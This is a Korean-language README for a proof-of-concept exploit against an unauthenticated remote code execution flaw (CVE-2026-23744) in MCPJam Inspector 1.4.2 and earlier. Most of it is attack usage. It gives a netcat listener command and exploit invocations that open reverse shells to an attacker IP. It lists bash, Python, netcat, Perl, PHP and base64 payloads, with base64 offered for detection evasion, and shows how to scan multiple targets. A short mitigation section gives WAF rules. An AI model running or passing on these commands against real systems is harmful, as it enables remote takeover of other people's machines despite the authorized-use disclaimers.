
CVE-2026-23744 - MCPJam Inspector 원격 코드 실행(RCE) 취약점에 대한 개념 증명 익스플로잇입니다. 이 도구는 <=1.4.2 버전의 보안 결함을 시연하며 보안 연구자가 패치를 검증하는 데 도움을 줍니다. 승인된 테스트 및 교육 목적으로만 사용하십시오. 여러 페이로드 옵션, 명령 실행 및 세션 관리를 포함합니다.
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다. 무단 사용은 불법입니다. 사용자는 자신의 행동에 대한 모든 책임을 집니다.
이 저장소는 CVE-2026-23744에 대한 개념 증명 익스플로잇으로, MCPJam Inspector 버전 <=1.4.2에서 발견된 인증되지 않은 원격 코드 실행(RCE) 취약점입니다. 이 취약점은 네트워크 공격 벡터로 심각한 위험을 나타내는 CVSS 점수 9.8을 가지고 있습니다.
| 속성 | 세부 정보 |
|---|---|
| CVE ID | CVE-2026-23744 |
| 취약점 | 인증되지 않은 원격 코드 실행 |
| 영향받는 버전 | <=1.4.2 |
| CVSS 점수 | 9.8 (심각) |
| 공격 벡터 | 네트워크 |
익스플로잇 도구는 효과적인 보안 테스트를 위해 설계된 다양한 기능을 제공합니다:
익스플로잇 도구를 설정하려면 다음 단계를 따르십시오:
저장소를 클론합니다:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
의존성을 설치합니다:
pip install -r requirements.txt
기본 익스플로잇을 시작하려면 먼저 리스너를 설정한 다음 익스플로잇 스크립트를 실행하십시오:
# 리스너 시작
nc -lvnp 4444
# 익스플로잇 실행
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
단일 명령 또는 파일에서 명령을 실행합니다:
# 단일 명령 실행
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# 파일에서 명령 실행
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
다양한 시나리오에 대해 여러 페이로드 유형을 활용합니다:
# Python 리버스 셸
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Netcat 리버스 셸
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Base64 인코딩 페이로드
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
취약점이 있는 여러 대상을 스캔합니다:
# 대상 파일 생성
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# 취약한 대상 스캔
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
지문 식별, 프록시 사용, 상세 모드, 자동 리스너 설정과 같은 고급 기능을 탐색합니다:
# 지문 식별 포함
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# 프록시 사용
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# 상세 모드
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# 자동 리스너
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
[+] 향상된 익스플로잇 시작: http://192.168.1.100:8080
[+] 리버스 셸 to 10.0.0.5:4444
[*] 세션 ID: AbCdEfGh
[*] 대상 지문 식별 중...
[+] 대상 OS: Ubuntu
[+] 사용 가능한 기능: python3, perl, nc
[*] 익스플로잇 실행 중...
[+] 익스플로잇 성공!
[!] 10.0.0.5:4444에서 netcat 리스너를 확인하세요.
CVE-2026-23744로부터 보호하려면 다음 즉시 조치를 취하는 것이 중요합니다:
/api/mcp/connect로의 의심스러운 POST 요청을 모니터링하세요.일반적인 악성 패턴을 차단하는 Nginx WAF 규칙 예제:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
Q: 사용해도 합법인가요?
A: 이 도구는 귀하가 소유하거나 명시적인 서면 허가를 받은 시스템에서만 사용하는 것이 합법입니다.
Q: 어떤 시스템이 취약한가요?
A: MCPJam Inspector 버전 <=1.4.2가 취약합니다.
Q: 내 시스템을 어떻게 보호할 수 있나요?
A: 즉시 MCPJam Inspector를 버전 >1.4.2로 업그레이드하세요.
Sudeepa Wanigarathna
이 도구의 무단 사용은 불법이며 다음과 같은 심각한 결과를 초래할 수 있습니다:
Sudeepa Wanigarathna가 ❤️로 제작함
| 유형 | 명령 | 최적 사용 |
|---|
bash | Bash 리버스 셸 | 대부분의 Linux 시스템 |
python | Python3 리버스 셸 | Python이 설치된 시스템 |
nc | Netcat 리버스 셸 | netcat이 있는 시스템 |
perl | Perl 리버스 셸 | Perl이 설치된 시스템 |
php | PHP 리버스 셸 | PHP가 설치된 시스템 |
base64 | Base64 인코딩 | 탐지 회피 |